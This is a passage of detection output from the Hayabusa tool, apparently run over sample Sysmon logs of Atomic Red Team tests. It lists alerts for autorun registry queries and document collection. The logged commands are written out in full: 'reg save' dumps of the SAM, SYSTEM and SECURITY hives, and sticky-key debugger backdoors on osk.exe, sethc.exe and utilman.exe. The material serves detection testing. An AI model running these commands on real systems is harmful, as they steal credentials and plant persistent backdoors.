""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : 